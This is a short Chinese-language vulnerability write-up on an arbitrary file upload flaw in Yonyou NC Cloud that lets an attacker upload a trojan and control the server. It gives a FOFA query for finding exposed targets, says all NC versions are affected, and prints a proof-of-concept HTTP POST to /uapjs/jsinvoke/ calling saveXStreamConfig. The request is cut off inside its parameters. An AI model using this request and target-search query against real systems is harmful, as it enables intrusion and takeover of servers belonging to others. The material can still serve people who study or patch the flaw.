0x01 漏洞分析
用友NC Cloud 存在任意文件上传漏洞,攻击者通过此漏洞可实现上传木马文件,控制服务器。
通过MethodInvocationHandler类中的异常处理信息也可以看出,该漏洞可以通过传入的json来调用实现过的本地服务接口
0x02 漏洞复现
fofa语法:title="YONYOUNC"
影响范围:
包括了nc所有系列版本
poc:
POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Connection: close
Content-Length: 213
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":[&#